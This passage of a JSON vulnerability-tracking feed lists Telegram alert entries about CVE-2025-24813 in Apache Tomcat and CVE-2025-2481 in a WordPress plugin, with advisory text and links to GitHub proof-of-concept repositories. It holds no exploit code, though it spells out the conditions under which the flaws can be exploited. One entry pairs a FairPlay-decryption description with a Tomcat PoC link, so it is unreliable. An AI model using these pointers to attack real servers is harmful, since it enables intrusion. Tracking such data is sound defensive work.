for the CVE-2025-24813 and tested in different environments.\nURL\uff1ahttps://github.com/CEAlbez/CVE-2025-24813-PoC\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-03T11:39:28.000000Z"}, {"uuid": "11be6eb4-3ff5-4122-800b-093884721808", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/50761", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1a\ud83d\udd13 Decrypt FairPlay-protected iOS apps on macOS (SIP-enabled) using CVE-2025-24204. Supports macOS 15.0-15.2.\nURL\uff1ahttps://github.com/Makavellik/POC-CVE-2025-24813-Apache-Tomcat-Remote-Code-Execution\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-09-08T18:06:19.000000Z"}, {"uuid": "8d75d4cd-01f9-4407-98a2-f7cfcbfd2e33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/29853", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1asimple exp for CVE-2025-24813\nURL\uff1ahttps://github.com/AsaL1n/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-05T09:12:06.000000Z"}, {"uuid": "b7c0ccaf-015f-4cb1-b896-3ce36ca5e9ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2481", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/9002", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2481\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: The MediaView plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018id' parameter in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n\ud83d\udccf Published: 2025-03-27T01:48:04.231Z\n\ud83d\udccf Modified: 2025-03-27T01:48:04.231Z\n\ud83d\udd17 References:\n1. https://www.wordfence.com/threat-intel/vulnerabilities/id/ca2d687f-0358-4642-849b-100bf40cbbf1?source=cve\n2. https://plugins.trac.wordpress.org/browser/mediaview/tags/1.1.2/inc/forms/addMedia.inc.php#L48\n3. https://wordpress.org/plugins/mediaview/#developers", "creation_timestamp": "2025-03-27T02:26:20.000000Z"}, {"uuid": "1caa71a7-e867-45e6-8c5a-825d7c73159d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9834", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24813\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: Path Equivalence: 'file.Name' (Internal Dot) leading to\u00a0Remote Code Execution and/or Information disclosure\u00a0and/or malicious content added to uploaded files via write enabled\u00a0Default Servlet\u00a0in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.2, from 10.1.0-M1 through 10.1.34, from 9.0.0.M1 through 9.0.98.\n\nIf all of the following were true, a malicious user was able to view       security sensitive files and/or inject content into those files:\n-\u00a0writes enabled for the default servlet (disabled by default)\n- support for partial PUT (enabled by default)\n- a target URL for security sensitive uploads that was a sub-directory of\u00a0a target URL for public uploads\n-\u00a0attacker knowledge of the names of security sensitive files being\u00a0uploaded\n-\u00a0the security sensitive files also being uploaded via partial PUT\n\nIf all of the following were true, a malicious user was able to       perform remote code execution:\n- writes enabled for the default servlet (disabled by default)\n-\u00a0support for partial PUT (enabled by default)\n-\u00a0application was using Tomcat's file based session persistence with the\u00a0default storage location\n-\u00a0application included a library that may be leveraged in a\u00a0deserialization attack\n\nUsers are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.99, which fixes the issue.\n\ud83d\udccf Published: 2025-03-10T16:44:03.715Z\n\ud83d\udccf Modified: 2025-04-01T03:55:21.139Z\n\ud83d\udd17 References:\n1. https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq", "creation_timestamp": "2025-04-01T04:32:06.000000Z"}, {"uuid": "37394718-56d8-4cc6-bcde-537f1cd2bd0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/34430", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aProof of Concept (PoC) script for CVE-2025-24813, vulnerability in Apache Tomcat.\nURL\uff1ahttps://github.com/hakankarabacak/CVE-2025-24813\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-04-27T13:53:10.000000Z"}]}